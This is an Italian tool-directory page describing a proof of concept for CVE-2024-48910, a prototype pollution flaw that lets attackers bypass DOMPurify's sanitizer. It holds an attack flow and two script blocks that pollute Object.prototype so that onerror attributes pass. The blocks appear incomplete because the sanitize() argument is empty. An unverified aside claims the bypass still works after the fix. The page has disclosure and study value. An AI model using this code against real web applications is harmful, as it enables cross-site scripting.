Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-48910-PoC | Kitploit
Strumenti/GitHubGitHub/mitchellzhou1/cve-2024-48910-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Web
GitHubmitchellzhou1/cve-2024-48910-poc

CVE-2024-48910-PoC

Vedi Repository
27 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-48910-PoC

immagine

Panoramica

CVE-2024-48910 DOMPurify, un sanitizer XSS per HTML, MathML e SVG basato esclusivamente sul DOM, super veloce ed estremamente tollerante, è risultato vulnerabile alla prototype pollution (CVE-2024-48910). La vulnerabilità è stata scoperta e corretta nella versione 2.4.2, con la divulgazione iniziale effettuata il 31 ottobre 2024 .


Impatto

La vulnerabilità di prototype pollution in DOMPurify potrebbe consentire agli attaccanti di manomettere gli attributi del prototipo degli oggetti, portando potenzialmente a bypass di sicurezza e modifiche non autorizzate del comportamento dell'applicazione. L'elevato punteggio CVSS indica un impatto potenziale significativo sulla sicurezza del sistema, in particolare per quanto riguarda la riservatezza e l'integrità dei dati

Dettagli Tecnici

Alla vulnerabilità è stato assegnato un punteggio base CVSS v3.1 di 9.1 (CRITICAL) con stringa vettoriale CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N. Ciò indica che la vulnerabilità può essere sfruttata da remoto con bassa complessità di attacco, non richiede privilegi né interazione con l'utente e può avere un impatto elevato sia sulla riservatezza che sull'integrità, pur senza influire sulla disponibilità.

Dai changelog, puoi vedere che è stato aggiunto un caso di test che coinvolge .__proto__., suggerendo che si tratti di una prototype injection immagine

La riga successiva aggiunta era, il che significa che prima valutava true per qualsiasi cosa fosse truthy immagine

Flusso di Attacco e PoC

  1. Inquinare hasOwnProperty per far restituire Object
  2. Inquinare ALLOWED_ATTR con ["src", "onerror"]
  3. DOMPurify clona la sua configurazione usando la vulnerabile funzione clone()
  4. Il controllo hasOwnProperty passa per le proprietà inquinate (perché Object è truthy)
  5. La configurazione inquinata viene copiata nella configurazione interna di DOMPurify

Protezione XSS bypassata - onerror ora è "consentito"

root@kitploit:~
<script>Object.prototype.hasOwnProperty=Object</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize(''))</script>

Note a margine:

Nonostante l'aggiornamento alla 2.4.2, riesco ancora a far comparire l'alert()... tutto ciò che devi fare è impostare Object.prototype.hasOwnProperty = () => true; per bypassare la protezione LOL!!

root@kitploit:~
<script>Object.prototype.hasOwnProperty = () => true;</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize(''))</script>
Scarica lo strumento